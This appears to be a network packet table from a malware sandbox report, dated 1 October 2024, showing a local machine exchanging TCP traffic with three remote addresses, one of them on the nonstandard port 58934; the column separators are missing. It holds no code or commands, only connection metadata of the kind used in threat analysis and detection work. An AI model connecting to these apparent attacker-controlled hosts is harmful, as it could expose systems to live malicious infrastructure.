                                                                                                                                Oct 1, 2024 09:25:30.534648895 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534658909 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534668922 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534687042 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534692049 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534698009 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534708977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534710884 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534725904 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534737110 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534749031 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534755945 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534759998 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534771919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534801006 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534801960 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.535270929 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535280943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535291910 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535304070 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535316944 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535326958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535331964 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.535337925 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535347939 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535357952 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535368919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535368919 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.535378933 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535398960 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535408974 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.535410881 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.535410881 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:33.519982100 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.711755991 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.734061003 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.802294016 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.830118895 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.835325003 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.835439920 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.965526104 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.970555067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.036966085 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.162358046 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.167216063 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.167275906 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.168325901 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.173101902 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.781968117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.799901009 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.799977064 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.804599047 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.810441971 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.988681078 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.991210938 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.991300106 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.069417000 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.073494911 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.078324080 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.078397989 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.083236933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706787109 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706811905 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706825972 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706928015 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706949949 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706965923 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706981897 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706986904 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707067966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707067966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707091093 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707107067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707125902 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707158089 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707686901 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707703114 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707740068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.798163891 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.798386097 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:35.909060001 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.932439089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932586908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932595015 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932601929 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932609081 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932754040 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.932943106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932993889 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933016062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933027983 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933060884 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933099031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933109999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933151960 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933871984 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933936119 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933949947 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933980942 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934015036 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934025049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934056997 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934806108 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934851885 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934859991 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934870958 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934906960 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934956074 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934968948 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935009003 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.935703039 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935755968 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935765982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935797930 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.966793060 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.019285917 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172333956 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172350883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172364950 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172425985 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172420979 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172442913 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172454119 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172466040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172522068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172523022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172523022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172538042 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172549963 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172591925 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173216105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173276901 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173317909 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173361063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173372984 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173383951 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173429966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173891068 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173902035 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173912048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173923969 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173942089 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173970938 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173980951 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173991919 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174004078 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174015999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174031973 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174072027 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174814939 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174827099 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174839020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174850941 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174860954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174870968 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174902916 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174906969 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174915075 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174956083 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175470114 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175652027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175700903 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175713062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175740004 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175745964 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175789118 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.178431988 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.407147884 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407171011 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407179117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407243967 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407253981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407263994 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407274961 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645947933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645962954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.645975113 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.645978928 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646004915 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646122932 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646136999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646152020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646167040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646172047 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646182060 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646209955 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.646976948 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.646998882 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.647023916 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.647243977 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649697065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649739027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649753094 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649790049 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649836063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649849892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649864912 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649879932 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.649889946 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.649940968 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650051117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650064945 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650079966 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650094986 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650104046 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650110960 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650125980 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650141001 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650142908 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650166035 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650249004 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650264978 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650279999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650294065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.650300980 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.650340080 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871675968 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871711016 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871725082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871740103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871759892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871855021 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871876955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871884108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871884108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871893883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871933937 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871933937 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.871967077 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.871980906 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872028112 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872051001 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872066021 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872117043 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872172117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872188091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872201920 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872216940 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872231007 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872232914 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872267008 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872423887 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872438908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872452974 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872464895 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872474909 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872503042 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872558117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872574091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872589111 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872606993 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872618914 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872646093 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872708082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872724056 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872771025 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872808933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872831106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872847080 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872863054 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872875929 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872878075 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872894049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872905016 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872909069 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872924089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.872936964 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.872963905 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873153925 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873167992 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873182058 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873210907 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873250008 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873265982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873280048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873296976 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873305082 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873310089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873326063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873341084 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873343945 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873357058 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873366117 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873405933 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873610020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873625040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873671055 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873759031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873774052 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873797894 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873809099 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873812914 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873827934 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873842955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873856068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873857975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873873949 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873889923 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873891115 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873904943 CEST5893449173103.186.116.99192.168.2.22
